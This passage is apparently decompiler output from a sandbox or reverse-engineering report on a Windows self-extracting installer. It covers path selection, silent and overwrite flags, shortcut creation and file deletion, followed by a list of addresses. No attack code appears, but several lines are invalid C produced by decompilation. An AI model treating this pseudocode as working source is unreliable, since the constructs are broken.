                                                                                                                                                      															_t270 = E00406E67();
                                                                                                                                                      															__eflags = _t270;
                                                                                                                                                      															if(_t270 != 0) {
                                                                                                                                                      																MoveFileExA(_t309 - 0x834, 0, 4);
                                                                                                                                                      															}
                                                                                                                                                      														}
                                                                                                                                                      														goto L26;
                                                                                                                                                      													}
                                                                                                                                                      												}
                                                                                                                                                      											}
                                                                                                                                                      											L13:
                                                                                                                                                      											__eflags = E00406E67() - 4;
                                                                                                                                                      											if(__eflags == 0) {
                                                                                                                                                      												goto L18;
                                                                                                                                                      											}
                                                                                                                                                      											L14:
                                                                                                                                                      											E004072D9(_t301, __eflags, _t309 - 0x434, _t309 - 0x2034);
                                                                                                                                                      											E004076A1(_t309 - 0x2034);
                                                                                                                                                      											_t280 = E0040A35D(_t301, _t309 - 0x434);
                                                                                                                                                      											 *((intOrPtr*)(_t309 - 0xc)) = _t280;
                                                                                                                                                      											__eflags = _t280 - 4;
                                                                                                                                                      											if(_t280 < 4) {
                                                                                                                                                      												L16:
                                                                                                                                                      												_t282 = E00407252(_t301, _t309 - 0x1c34, 0);
                                                                                                                                                      												__eflags = _t282;
                                                                                                                                                      												if(_t282 != 0) {
                                                                                                                                                      													goto L27;
                                                                                                                                                      												}
                                                                                                                                                      												L17:
                                                                                                                                                      												 *((char*)(_t309 + E0040A35D(_t301, _t309 - 0x30d4) - 0x30d3)) = 0;
                                                                                                                                                      												E0040A262(_t301, _t309 - 0x34, 0, 0x1e);
                                                                                                                                                      												_push(0x14);
                                                                                                                                                      												_pop(_t287);
                                                                                                                                                      												 *((short*)(_t309 - 0x24)) = _t287;
                                                                                                                                                      												 *((intOrPtr*)(_t309 - 0x2c)) = _t309 - 0x30d4;
                                                                                                                                                      												 *((intOrPtr*)(_t309 - 0x30)) = 3;
                                                                                                                                                      												SHFileOperationA(_t309 - 0x34);
                                                                                                                                                      												goto L18;
                                                                                                                                                      											}
                                                                                                                                                      											L15:
                                                                                                                                                      											_t292 = E0040A35D(_t301, _t309 - 0x2034);
                                                                                                                                                      											__eflags =  *((intOrPtr*)(_t309 - 0xc)) - _t292;
                                                                                                                                                      											if( *((intOrPtr*)(_t309 - 0xc)) > _t292) {
                                                                                                                                                      												goto L17;
                                                                                                                                                      											}
                                                                                                                                                      											goto L16;
                                                                                                                                                      											L26:
                                                                                                                                                      											_push(0);
                                                                                                                                                      											_t301 = _t309 - 0x40dc;
                                                                                                                                                      											_t259 = E00405F6F(_t309 - 0x40dc, _t302, _t309 - 0x30d4);
                                                                                                                                                      											__eflags = _t259;
                                                                                                                                                      										} while (_t259 != 0);
                                                                                                                                                      										goto L27;
                                                                                                                                                      									}
                                                                                                                                                      								case 1:
                                                                                                                                                      									L28:
                                                                                                                                                      									__eflags =  *(__ebp + 0x10);
                                                                                                                                                      									if( *(__ebp + 0x10) == 0) {
                                                                                                                                                      										__eflags =  *((char*)(__ebp - 5));
                                                                                                                                                      										if(__eflags == 0) {
                                                                                                                                                      											__esi = __ebp + 0xc;
                                                                                                                                                      											__edi = E0040B793(__ebp + 0xc, __eflags);
                                                                                                                                                      										} else {
                                                                                                                                                      											__edi = __ebp - 0x1c34;
                                                                                                                                                      										}
                                                                                                                                                      										__eflags = __bl;
                                                                                                                                                      										if(__bl == 0) {
                                                                                                                                                      											__esi = E0040A35D(__ecx,  *0x41a81c);
                                                                                                                                                      										} else {
                                                                                                                                                      											__esi = 0;
                                                                                                                                                      										}
                                                                                                                                                      										E0040A35D(__ecx, __edi) = __eax + __esi + 5;
                                                                                                                                                      										__eax = E0040A1FD( *0x41a81c, __eax);
                                                                                                                                                      										 *0x41a81c = __eax;
                                                                                                                                                      										__eflags = __bl;
                                                                                                                                                      										if(__bl != 0) {
                                                                                                                                                      											 *__eax = 0;
                                                                                                                                                      										}
                                                                                                                                                      										__eax = E0040A5BB(__eax, __edi);
                                                                                                                                                      										__eflags =  *((char*)(__ebp - 5));
                                                                                                                                                      										if( *((char*)(__ebp - 5)) == 0) {
                                                                                                                                                      											__eax = E0040A1DE(__edi);
                                                                                                                                                      										}
                                                                                                                                                      									}
                                                                                                                                                      									goto L152;
                                                                                                                                                      								case 2:
                                                                                                                                                      									L41:
                                                                                                                                                      									__eflags =  *(__ebp + 0x10);
                                                                                                                                                      									if( *(__ebp + 0x10) == 0) {
                                                                                                                                                      										__ebp - 0x1c34 = SetWindowTextA( *(__ebp + 8), __ebp - 0x1c34); // executed
                                                                                                                                                      									}
                                                                                                                                                      									goto L152;
                                                                                                                                                      								case 3:
                                                                                                                                                      									L43:
                                                                                                                                                      									__eflags =  *(__ebp + 0x10);
                                                                                                                                                      									if( *(__ebp + 0x10) != 0) {
                                                                                                                                                      										goto L152;
                                                                                                                                                      									}
                                                                                                                                                      									L44:
                                                                                                                                                      									__eflags =  *0x419f92;
                                                                                                                                                      									if( *0x419f92 != 0) {
                                                                                                                                                      										goto L152;
                                                                                                                                                      									}
                                                                                                                                                      									L45:
                                                                                                                                                      									__eflags =  *(__ebp - 0x1c34) - 0x22;
                                                                                                                                                      									__esi = __ebp - 0x1c34;
                                                                                                                                                      									 *(__ebp - 0x434) = 0;
                                                                                                                                                      									if( *(__ebp - 0x1c34) == 0x22) {
                                                                                                                                                      										__esi = __ebp - 0x1c33;
                                                                                                                                                      									}
                                                                                                                                                      									__eax = E0040A35D(__ecx, __esi);
                                                                                                                                                      									__eflags = __eax - 0x400;
                                                                                                                                                      									if(__eax >= 0x400) {
                                                                                                                                                      										goto L152;
                                                                                                                                                      									} else {
                                                                                                                                                      										L48:
                                                                                                                                                      										__al = __esi->i;
                                                                                                                                                      										__eflags = __al - 0x2e;
                                                                                                                                                      										if(__al != 0x2e) {
                                                                                                                                                      											L57:
                                                                                                                                                      											__eflags = __al - 0x5c;
                                                                                                                                                      											if(__al == 0x5c) {
                                                                                                                                                      												L51:
                                                                                                                                                      												__ebp - 0x434 = E0040A450(__ebp - 0x434, __esi);
                                                                                                                                                      												L52:
                                                                                                                                                      												__eax = __ebp - 0x434;
                                                                                                                                                      												__eax = E0040A3B2(__ecx, __ebp - 0x434, 0x22);
                                                                                                                                                      												__eflags = __eax;
                                                                                                                                                      												if(__eax != 0) {
                                                                                                                                                      													__eflags =  *((char*)(__eax + 1));
                                                                                                                                                      													if( *((char*)(__eax + 1)) == 0) {
                                                                                                                                                      														 *__eax = 0;
                                                                                                                                                      													}
                                                                                                                                                      												}
                                                                                                                                                      												__ebp - 0x434 = E0040A450(__ebx, __ebp - 0x434);
                                                                                                                                                      												__ebp - 0x434 = E0040B989(__esi, __ebp - 0x434);
                                                                                                                                                      												__esi = GetDlgItem( *(__ebp + 8), 0x65);
                                                                                                                                                      												__ebp - 0x434 = SetWindowTextA(__esi, __ebp - 0x434); // executed
                                                                                                                                                      												__eax = SendMessageA(__esi, 0x143, 0, __ebx); // executed
                                                                                                                                                      												__eax = __ebp - 0x434;
                                                                                                                                                      												__eax = E0040A4C2(__ebx, __ebp - 0x434);
                                                                                                                                                      												__eflags = __eax;
                                                                                                                                                      												if(__eax != 0) {
                                                                                                                                                      													__ebp - 0x434 = SendMessageA(__esi, 0x143, 0, __ebp - 0x434);
                                                                                                                                                      												}
                                                                                                                                                      												goto L152;
                                                                                                                                                      											}
                                                                                                                                                      											L58:
                                                                                                                                                      											__eflags = __al;
                                                                                                                                                      											if(__al == 0) {
                                                                                                                                                      												L60:
                                                                                                                                                      												__eax = __ebp - 0x10;
                                                                                                                                                      												__eax = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", 0, 1, __ebp - 0x10); // executed
                                                                                                                                                      												__eflags = __eax;
                                                                                                                                                      												if(__eax == 0) {
                                                                                                                                                      													__ebp - 0xc = __ebp - 0x434;
                                                                                                                                                      													__eax = __ebp - 0x14;
                                                                                                                                                      													 *(__ebp - 0xc) = 0x400;
                                                                                                                                                      													__eax = RegQueryValueExA( *(__ebp - 0x10), "ProgramFilesDir", 0, __ebp - 0x14, __ebp - 0x434, __ebp - 0xc); // executed
                                                                                                                                                      													__eax = RegCloseKey( *(__ebp - 0x10)); // executed
                                                                                                                                                      												}
                                                                                                                                                      												__eflags =  *(__ebp - 0x434);
                                                                                                                                                      												if( *(__ebp - 0x434) != 0) {
                                                                                                                                                      													__eax = __ebp - 0x434;
                                                                                                                                                      													__eax = E0040A35D(__ecx, __ebp - 0x434);
                                                                                                                                                      													__ecx = __ebp - 0x434;
                                                                                                                                                      													__ecx = __ebp - 0x433;
                                                                                                                                                      													__eflags =  *((char*)(__eax + __ecx)) - 0x5c;
                                                                                                                                                      													if( *((char*)(__eax + __ecx)) != 0x5c) {
                                                                                                                                                      														__ebp - 0x434 = E0040A5BB(__ebp - 0x434, "\\");
                                                                                                                                                      													}
                                                                                                                                                      												}
                                                                                                                                                      												__edi = E0040A35D(__ecx, __esi);
                                                                                                                                                      												__eax = __ebp - 0x434;
                                                                                                                                                      												__edi = __edi + E0040A35D(__ecx, __ebp - 0x434);
                                                                                                                                                      												__eflags = __edi - 0x3ff;
                                                                                                                                                      												if(__edi < 0x3ff) {
                                                                                                                                                      													__ebp - 0x434 = E0040A5BB(__ebp - 0x434, __esi);
                                                                                                                                                      												}
                                                                                                                                                      												goto L52;
                                                                                                                                                      											}
                                                                                                                                                      											L59:
                                                                                                                                                      											__eflags = __esi->i - 0x3a;
                                                                                                                                                      											if(__esi->i == 0x3a) {
                                                                                                                                                      												goto L51;
                                                                                                                                                      											}
                                                                                                                                                      											goto L60;
                                                                                                                                                      										}
                                                                                                                                                      										L49:
                                                                                                                                                      										__eflags = __esi->i - 0x5c;
                                                                                                                                                      										if(__esi->i != 0x5c) {
                                                                                                                                                      											goto L57;
                                                                                                                                                      										}
                                                                                                                                                      										L50:
                                                                                                                                                      										__esi =  &(__esi->i);
                                                                                                                                                      										__eflags = __esi->i;
                                                                                                                                                      										if(__esi->i == 0) {
                                                                                                                                                      											goto L152;
                                                                                                                                                      										}
                                                                                                                                                      										goto L51;
                                                                                                                                                      									}
                                                                                                                                                      								case 4:
                                                                                                                                                      									L67:
                                                                                                                                                      									__eflags =  *0x419f8c - 1;
                                                                                                                                                      									__eflags = __eax - 0x419f8c;
                                                                                                                                                      									 *__edi =  *__edi + __ecx;
                                                                                                                                                      									__eflags =  *(__ebp + 5) & __cl;
                                                                                                                                                      									 *__eax =  *__eax + __al;
                                                                                                                                                      									__eflags =  *__eax;
                                                                                                                                                      								case 5:
                                                                                                                                                      									L72:
                                                                                                                                                      									__eax =  *(__ebp - 0x1c34);
                                                                                                                                                      									__eax =  *(__ebp - 0x1c34);
                                                                                                                                                      									__eflags = __eax;
                                                                                                                                                      									if(__eax == 0) {
                                                                                                                                                      										L79:
                                                                                                                                                      										 *0x419edf = 0;
                                                                                                                                                      										 *0x419ede = 1;
                                                                                                                                                      										goto L152;
                                                                                                                                                      									}
                                                                                                                                                      									L73:
                                                                                                                                                      									__eax = __eax - 0x30;
                                                                                                                                                      									__eflags = __eax;
                                                                                                                                                      									if(__eax == 0) {
                                                                                                                                                      										L77:
                                                                                                                                                      										 *0x419edf = 0;
                                                                                                                                                      										L78:
                                                                                                                                                      										 *0x419ede = 0;
                                                                                                                                                      										goto L152;
                                                                                                                                                      									}
                                                                                                                                                      									L74:
                                                                                                                                                      									__eax = __eax - 1;
                                                                                                                                                      									__eflags = __eax;
                                                                                                                                                      									if(__eax == 0) {
                                                                                                                                                      										goto L79;
                                                                                                                                                      									}
                                                                                                                                                      									L75:
                                                                                                                                                      									__eax = __eax - 1;
                                                                                                                                                      									__eflags = __eax;
                                                                                                                                                      									if(__eax != 0) {
                                                                                                                                                      										goto L152;
                                                                                                                                                      									} else {
                                                                                                                                                      										 *0x419edf = 1;
                                                                                                                                                      										goto L78;
                                                                                                                                                      									}
                                                                                                                                                      								case 6:
                                                                                                                                                      									L85:
                                                                                                                                                      									__eflags =  *(__ebp + 0x10) - 4;
                                                                                                                                                      									if( *(__ebp + 0x10) != 4) {
                                                                                                                                                      										goto L152;
                                                                                                                                                      									}
                                                                                                                                                      									L86:
                                                                                                                                                      									_push(0);
                                                                                                                                                      									goto L87;
                                                                                                                                                      								case 7:
                                                                                                                                                      									goto L0;
                                                                                                                                                      								case 8:
                                                                                                                                                      									L107:
                                                                                                                                                      									__eflags =  *(__ebp + 0x10) - 3;
                                                                                                                                                      									if( *(__ebp + 0x10) == 3) {
                                                                                                                                                      										__eflags =  *(__ebp - 0x1c34);
                                                                                                                                                      										if(__eflags != 0) {
                                                                                                                                                      											__ebp - 0x1c34 = SetWindowTextA( *(__ebp + 8), __ebp - 0x1c34);
                                                                                                                                                      										}
                                                                                                                                                      										__esi = __ebp + 0xc;
                                                                                                                                                      										 *0x41a820 = E0040B793(__esi, __eflags);
                                                                                                                                                      									}
                                                                                                                                                      									 *0x41a817 = 1;
                                                                                                                                                      									goto L152;
                                                                                                                                                      								case 9:
                                                                                                                                                      									L112:
                                                                                                                                                      									__eflags =  *(__ebp + 0x10) - 5;
                                                                                                                                                      									if( *(__ebp + 0x10) != 5) {
                                                                                                                                                      										goto L152;
                                                                                                                                                      									}
                                                                                                                                                      									L113:
                                                                                                                                                      									_push(1);
                                                                                                                                                      									L87:
                                                                                                                                                      									__ebp - 0x1c34 = E0040BD59(__ebp - 0x1c34, __ecx); // executed
                                                                                                                                                      									goto L152;
                                                                                                                                                      								case 0xa:
                                                                                                                                                      									L114:
                                                                                                                                                      									__eflags =  *(__ebp + 0x10) - 6;
                                                                                                                                                      									if( *(__ebp + 0x10) != 6) {
                                                                                                                                                      										goto L152;
                                                                                                                                                      									}
                                                                                                                                                      									L115:
                                                                                                                                                      									__eax =  *((char*)(__ebp - 0xb4dc));
                                                                                                                                                      									__eax = E0040A229(__ecx,  *((char*)(__ebp - 0xb4dc)));
                                                                                                                                                      									__eax = __eax - 0x50;
                                                                                                                                                      									__eflags = __eax;
                                                                                                                                                      									if(__eax == 0) {
                                                                                                                                                      										 *(__ebp - 4) = 2;
                                                                                                                                                      									} else {
                                                                                                                                                      										__eax = __eax - 3;
                                                                                                                                                      										__eflags = __eax;
                                                                                                                                                      										if(__eax == 0) {
                                                                                                                                                      											 *(__ebp - 4) = 0xb;
                                                                                                                                                      										} else {
                                                                                                                                                      											__eax = __eax - 1;
                                                                                                                                                      											__eflags = __eax;
                                                                                                                                                      											if(__eax == 0) {
                                                                                                                                                      												 *(__ebp - 4) = 7;
                                                                                                                                                      											} else {
                                                                                                                                                      												 *(__ebp - 4) = 0x10;
                                                                                                                                                      											}
                                                                                                                                                      										}
                                                                                                                                                      									}
                                                                                                                                                      									__ebp - 0xa4dc = __ebp - 0xc34;
                                                                                                                                                      									 *(__ebp - 0x2034) = 0;
                                                                                                                                                      									 *(__ebp - 0x834) = 0;
                                                                                                                                                      									__eax = E0040A450(__ebp - 0xc34, __ebp - 0xa4dc);
                                                                                                                                                      									__eflags =  *(__ebp - 0xc34) - 0x22;
                                                                                                                                                      									if(__eflags != 0) {
                                                                                                                                                      										L125:
                                                                                                                                                      										__ebp - 0xc34 = E0040572E(__eflags, __ebp - 0xc34, 0);
                                                                                                                                                      										__eflags = __al;
                                                                                                                                                      										if(__al != 0) {
                                                                                                                                                      											goto L139;
                                                                                                                                                      										}
                                                                                                                                                      										L126:
                                                                                                                                                      										__edi = 0;
                                                                                                                                                      										__eflags =  *(__ebp - 0xc34);
                                                                                                                                                      										__esi = __ebp - 0xc34;
                                                                                                                                                      										if( *(__ebp - 0xc34) == 0) {
                                                                                                                                                      											goto L139;
                                                                                                                                                      										} else {
                                                                                                                                                      											goto L127;
                                                                                                                                                      										}
                                                                                                                                                      										do {
                                                                                                                                                      											L127:
                                                                                                                                                      											__bl = __esi->i;
                                                                                                                                                      											__eflags = __bl - 0x20;
                                                                                                                                                      											if(__eflags == 0) {
                                                                                                                                                      												L129:
                                                                                                                                                      												__eax = __ebp - 0xc34;
                                                                                                                                                      												__esi->i = 0;
                                                                                                                                                      												__eax = E0040572E(__eflags, __ebp - 0xc34, 0);
                                                                                                                                                      												__eflags = __al;
                                                                                                                                                      												if(__al == 0) {
                                                                                                                                                      													L135:
                                                                                                                                                      													__esi->i = __bl;
                                                                                                                                                      													goto L136;
                                                                                                                                                      												}
                                                                                                                                                      												L130:
                                                                                                                                                      												__edi = __esi;
                                                                                                                                                      												__eflags = __bl - 0x2f;
                                                                                                                                                      												if(__bl != 0x2f) {
                                                                                                                                                      													do {
                                                                                                                                                      														L132:
                                                                                                                                                      														__esi =  &(__esi->i);
                                                                                                                                                      														__eflags = __esi->i - 0x20;
                                                                                                                                                      													} while (__esi->i == 0x20);
                                                                                                                                                      													_push(__esi);
                                                                                                                                                      													__eax = __ebp - 0x834;
                                                                                                                                                      													L134:
                                                                                                                                                      													_push(__eax);
                                                                                                                                                      													__eax = E0040A450();
                                                                                                                                                      													 *__edi = __bl;
                                                                                                                                                      													goto L136;
                                                                                                                                                      												}
                                                                                                                                                      												L131:
                                                                                                                                                      												_t185 =  &(__esi->i); // 0x1
                                                                                                                                                      												__eax = _t185;
                                                                                                                                                      												_push(_t185);
                                                                                                                                                      												 *(__ebp - 0x834) = __bl;
                                                                                                                                                      												__eax = __ebp - 0x833;
                                                                                                                                                      												goto L134;
                                                                                                                                                      											}
                                                                                                                                                      											L128:
                                                                                                                                                      											__eflags = __bl - 0x2f;
                                                                                                                                                      											if(__eflags != 0) {
                                                                                                                                                      												goto L136;
                                                                                                                                                      											}
                                                                                                                                                      											goto L129;
                                                                                                                                                      											L136:
                                                                                                                                                      											__esi =  &(__esi->i);
                                                                                                                                                      											__eflags = __esi->i;
                                                                                                                                                      										} while (__esi->i != 0);
                                                                                                                                                      										__eflags = __edi;
                                                                                                                                                      										if(__edi != 0) {
                                                                                                                                                      											 *__edi = 0;
                                                                                                                                                      										}
                                                                                                                                                      										goto L139;
                                                                                                                                                      									} else {
                                                                                                                                                      										L123:
                                                                                                                                                      										__ebp - 0xa4db = __ebp - 0xc34;
                                                                                                                                                      										E0040A450(__ebp - 0xc34, __ebp - 0xa4db) = __ebp - 0xc33;
                                                                                                                                                      										__eax = E00407384(__ebp - 0xc33, 0x22);
                                                                                                                                                      										__eflags = __eax;
                                                                                                                                                      										if(__eax != 0) {
                                                                                                                                                      											 *__eax = 0;
                                                                                                                                                      											__ebp - 0x834 = E0040A450(__ebp - 0x834, __ebp - 0x834);
                                                                                                                                                      										}
                                                                                                                                                      										L139:
                                                                                                                                                      										__eflags =  *((char*)(__ebp - 0x64dc));
                                                                                                                                                      										if( *((char*)(__ebp - 0x64dc)) != 0) {
                                                                                                                                                      											__ebp - 0x2034 = __ebp - 0x64dc;
                                                                                                                                                      											__eax = E004057E4(__ebp - 0x64dc, __ebp - 0x2034);
                                                                                                                                                      										}
                                                                                                                                                      										__ebp - 0x44dc = __ebp - 0xc34;
                                                                                                                                                      										E004057E4(__ebp - 0xc34, __ebp - 0x44dc) = __ebp - 0x434;
                                                                                                                                                      										__eax = E0040AA9B(__ecx, __ebp - 0x434,  *(__ebp - 4)); // executed
                                                                                                                                                      										__ebp - 0x434 = E004076A1(__ebp - 0x434);
                                                                                                                                                      										__eflags =  *((char*)(__ebp - 0x94dc));
                                                                                                                                                      										if( *((char*)(__ebp - 0x94dc)) != 0) {
                                                                                                                                                      											__ebp - 0x94dc = __ebp - 0x434;
                                                                                                                                                      											E0040A5BB(__ebp - 0x434, __ebp - 0x94dc) = __ebp - 0x434;
                                                                                                                                                      											__eax = E004076A1(__ebp - 0x434);
                                                                                                                                                      										}
                                                                                                                                                      										__ebp - 0x434 = __ebp - 0x34d4;
                                                                                                                                                      										__eax = E0040A450(__ebp - 0x34d4, __ebp - 0x434);
                                                                                                                                                      										__eflags =  *(__ebp - 0x74dc);
                                                                                                                                                      										__eax = __ebp - 0x74dc;
                                                                                                                                                      										if( *(__ebp - 0x74dc) == 0) {
                                                                                                                                                      											__eax = __ebp - 0xa4dc;
                                                                                                                                                      										}
                                                                                                                                                      										__ebp - 0x434 = E0040A5BB(__ebp - 0x434, __ebp - 0x434);
                                                                                                                                                      										__eax = __ebp - 0x434;
                                                                                                                                                      										__eax = E00407669(__ebp - 0x434);
                                                                                                                                                      										__eflags = __eax;
                                                                                                                                                      										if(__eax == 0) {
                                                                                                                                                      											L147:
                                                                                                                                                      											__ebp - 0x434 = E0040A5BB(__ebp - 0x434, ".lnk");
                                                                                                                                                      											goto L148;
                                                                                                                                                      										} else {
                                                                                                                                                      											L146:
                                                                                                                                                      											__eax = E0040A573(__eax, ".lnk");
                                                                                                                                                      											__eflags = __eax;
                                                                                                                                                      											if(__eax == 0) {
                                                                                                                                                      												L148:
                                                                                                                                                      												__ebp - 0x434 = E004058C1(__ebx, __esi, __ebp - 0x434, 0, 1); // executed
                                                                                                                                                      												 *(__ebp - 0x834) =  ~( *(__ebp - 0x834));
                                                                                                                                                      												asm("sbb eax, eax");
                                                                                                                                                      												__ecx = __ebp - 0x834;
                                                                                                                                                      												 ~( *(__ebp - 0x834)) & __ebp - 0x00000834 =  *(__ebp - 0x2034);
                                                                                                                                                      												__eax =  ~( *(__ebp - 0x2034));
                                                                                                                                                      												asm("sbb eax, eax");
                                                                                                                                                      												__ecx = __ebp - 0x2034;
                                                                                                                                                      												 ~( *(__ebp - 0x2034)) & __ebp - 0x00002034 =  *(__ebp - 0x84dc);
                                                                                                                                                      												__eax =  ~( *(__ebp - 0x84dc));
                                                                                                                                                      												asm("sbb eax, eax");
                                                                                                                                                      												__ecx = __ebp - 0x84dc;
                                                                                                                                                      												 ~( *(__ebp - 0x84dc)) & __ebp - 0x000084dc = __ebp - 0x434;
                                                                                                                                                      												__ebp - 0x44dc = E0040A996(__ebp - 0x44dc, __ebp - 0x434,  ~( *(__ebp - 0x84dc)) & __ebp - 0x000084dc,  ~( *(__ebp - 0x2034)) & __ebp - 0x00002034,  ~( *(__ebp - 0x834)) & __ebp - 0x00000834); // executed
                                                                                                                                                      												__eflags =  *(__ebp - 0x34d4);
                                                                                                                                                      												if( *(__ebp - 0x34d4) != 0) {
                                                                                                                                                      													__eax = __ebp - 0x34d4;
                                                                                                                                                      													SHChangeNotify(0x1000, 1, __ebp - 0x34d4, 0); // executed
                                                                                                                                                      												}
                                                                                                                                                      												goto L152;
                                                                                                                                                      											}
                                                                                                                                                      											goto L147;
                                                                                                                                                      										}
                                                                                                                                                      									}
                                                                                                                                                      								case 0xb:
                                                                                                                                                      									L150:
                                                                                                                                                      									__eflags =  *(__ebp + 0x10) - 7;
                                                                                                                                                      									if( *(__ebp + 0x10) == 7) {
                                                                                                                                                      										 *0x419f90 = 1;
                                                                                                                                                      									}
                                                                                                                                                      									goto L152;
                                                                                                                                                      								case 0xc:
                                                                                                                                                      									L80:
                                                                                                                                                      									__eax =  *(__ebp - 0x1c34);
                                                                                                                                                      									__eax = E0040A229(__ecx,  *(__ebp - 0x1c34));
                                                                                                                                                      									__eflags = __eax - 0x46;
                                                                                                                                                      									if(__eax == 0x46) {
                                                                                                                                                      										 *0x419edd = 1;
                                                                                                                                                      									} else {
                                                                                                                                                      										__eflags = __eax - 0x55;
                                                                                                                                                      										if(__eax == 0x55) {
                                                                                                                                                      											 *0x419edc = 1;
                                                                                                                                                      										} else {
                                                                                                                                                      											 *0x419edd = 0;
                                                                                                                                                      											 *0x419edc = 0;
                                                                                                                                                      										}
                                                                                                                                                      									}
                                                                                                                                                      									goto L152;
                                                                                                                                                      							}
                                                                                                                                                      							L2:
                                                                                                                                                      							_t232 = E0040A8FE(_t232,  *(_t309 - 4));
                                                                                                                                                      							 *(_t309 - 4) =  *(_t309 - 4) + 0x1000;
                                                                                                                                                      							_t9 = _t309 - 0xc;
                                                                                                                                                      							 *_t9 =  *((intOrPtr*)(_t309 - 0xc)) - 1;
                                                                                                                                                      							if( *_t9 != 0) {
                                                                                                                                                      								goto L2;
                                                                                                                                                      							} else {
                                                                                                                                                      								 *(_t309 - 4) =  *(_t309 - 4) & 0x00000000;
                                                                                                                                                      								goto L4;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      						return _t231;
                                                                                                                                                      					}
                                                                                                                                                      					L92:
                                                                                                                                                      					if( *0x41a816 != 0) {
                                                                                                                                                      						goto L152;
                                                                                                                                                      					}
                                                                                                                                                      					L93:
                                                                                                                                                      					__eax = __ebp - 0x1c34;
                                                                                                                                                      					 *(__ebp - 0x234) = 0;
                                                                                                                                                      					__eax = E0040A386(__ebp - 0x1c34, 0x2c);
                                                                                                                                                      					if(__eax != 0) {
                                                                                                                                                      						L99:
                                                                                                                                                      						if( *(__ebp - 0x234) == 0) {
                                                                                                                                                      							__ebp - 0xb4dc = __ebp - 0x1c34;
                                                                                                                                                      							E0040A450(__ebp - 0x1c34, __ebp - 0xb4dc) = __ebp - 0xa4dc;
                                                                                                                                                      							__ebp - 0x234 = E0040A450(__ebp - 0x234, __ebp - 0xa4dc);
                                                                                                                                                      						}
                                                                                                                                                      						__ebp - 0x1c34 = E0040AB7A(__ebp - 0x1c34);
                                                                                                                                                      						__ebp - 0x234 = __ebp - 0x1c34;
                                                                                                                                                      						 *((char*)(__ebp - 0x1434)) = 0;
                                                                                                                                                      						__eax = MessageBoxA( *(__ebp + 8), __ebp - 0x1c34, __ebp - 0x234, 0x24);
                                                                                                                                                      						if(__eax == 6) {
                                                                                                                                                      							goto L152;
                                                                                                                                                      						} else {
                                                                                                                                                      							L102:
                                                                                                                                                      							0 = 1;
                                                                                                                                                      							 *0x41a815 = 1;
                                                                                                                                                      							 *0x419f78 = 1;
                                                                                                                                                      							__eax = EndDialog( *(__ebp + 8), 1);
                                                                                                                                                      							goto L103;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					L94:
                                                                                                                                                      					__esi = 0;
                                                                                                                                                      					if( *(__ebp - 0x1c34) == 0) {
                                                                                                                                                      						goto L99;
                                                                                                                                                      					} else {
                                                                                                                                                      						goto L95;
                                                                                                                                                      					}
                                                                                                                                                      					while(1) {
                                                                                                                                                      						L95:
                                                                                                                                                      						if( *((char*)(__ebp + __esi - 0x1c34)) == 0x40) {
                                                                                                                                                      							break;
                                                                                                                                                      						}
                                                                                                                                                      						L96:
                                                                                                                                                      						__esi =  &(__esi->i);
                                                                                                                                                      						if( *((char*)(__ebp + __esi - 0x1c34)) != 0) {
                                                                                                                                                      							continue;
                                                                                                                                                      						}
                                                                                                                                                      						L97:
                                                                                                                                                      						goto L99;
                                                                                                                                                      					}
                                                                                                                                                      					L98:
                                                                                                                                                      					__ebp + __esi - 0x1c33 = __ebp - 0x234;
                                                                                                                                                      					__eax = E0040A450(__ebp - 0x234, __ebp + __esi - 0x1c33);
                                                                                                                                                      					 *((char*)(__ebp + __esi - 0x1c34)) = 0;
                                                                                                                                                      					goto L99;
                                                                                                                                                      					L103:
                                                                                                                                                      					if( *((intOrPtr*)(_t309 + 0x10)) == 7) {
                                                                                                                                                      						if( *0x419f8c == 0) {
                                                                                                                                                      							 *0x419f8c = 2;
                                                                                                                                                      						}
                                                                                                                                                      						 *0x419f88 = 1;
                                                                                                                                                      					}
                                                                                                                                                      					goto L152;
                                                                                                                                                      				}
                                                                                                                                                      			}








                                                                                                                                                      0x0040c59b
                                                                                                                                                      0x0040c59b
                                                                                                                                                      0x0040c59b
                                                                                                                                                      0x0040c59b
                                                                                                                                                      0x0040c59f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c5a5
                                                                                                                                                      0x0040c5b1
                                                                                                                                                      0x0040c5be
                                                                                                                                                      0x0040c5c3
                                                                                                                                                      0x0040c5c7
                                                                                                                                                      0x0040c5c9
                                                                                                                                                      0x0040c5d6
                                                                                                                                                      0x0040c5d6
                                                                                                                                                      0x0040c5dc
                                                                                                                                                      0x0040c5e3
                                                                                                                                                      0x0040c5eb
                                                                                                                                                      0x0040c5ed
                                                                                                                                                      0x0040c5f0
                                                                                                                                                      0x0040c5f7
                                                                                                                                                      0x0040c5fc
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c5d0
                                                                                                                                                      0x0040c5d0
                                                                                                                                                      0x0040c5d0
                                                                                                                                                      0x0040c5d3
                                                                                                                                                      0x0040c5d3
                                                                                                                                                      0x0040c5fe
                                                                                                                                                      0x0040c60a
                                                                                                                                                      0x0040c617
                                                                                                                                                      0x0040ca0c
                                                                                                                                                      0x0040ca0c
                                                                                                                                                      0x0040ca1b
                                                                                                                                                      0x0040ca2a
                                                                                                                                                      0x0040ca2f
                                                                                                                                                      0x0040ca33
                                                                                                                                                      0x0040ca39
                                                                                                                                                      0x0040bfba
                                                                                                                                                      0x0040bfd1
                                                                                                                                                      0x0040bfd7
                                                                                                                                                      0x0040bfda
                                                                                                                                                      0x0040bfda
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bffa
                                                                                                                                                      0x0040c015
                                                                                                                                                      0x0040c01c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c01e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c01e
                                                                                                                                                      0x0040c01c
                                                                                                                                                      0x0040c027
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c02d
                                                                                                                                                      0x0040c030
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c037
                                                                                                                                                      0x0040c037
                                                                                                                                                      0x0040c03b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c041
                                                                                                                                                      0x0040c04d
                                                                                                                                                      0x0040c061
                                                                                                                                                      0x0040c06d
                                                                                                                                                      0x0040c080
                                                                                                                                                      0x0040c08b
                                                                                                                                                      0x0040c09d
                                                                                                                                                      0x0040c0a8
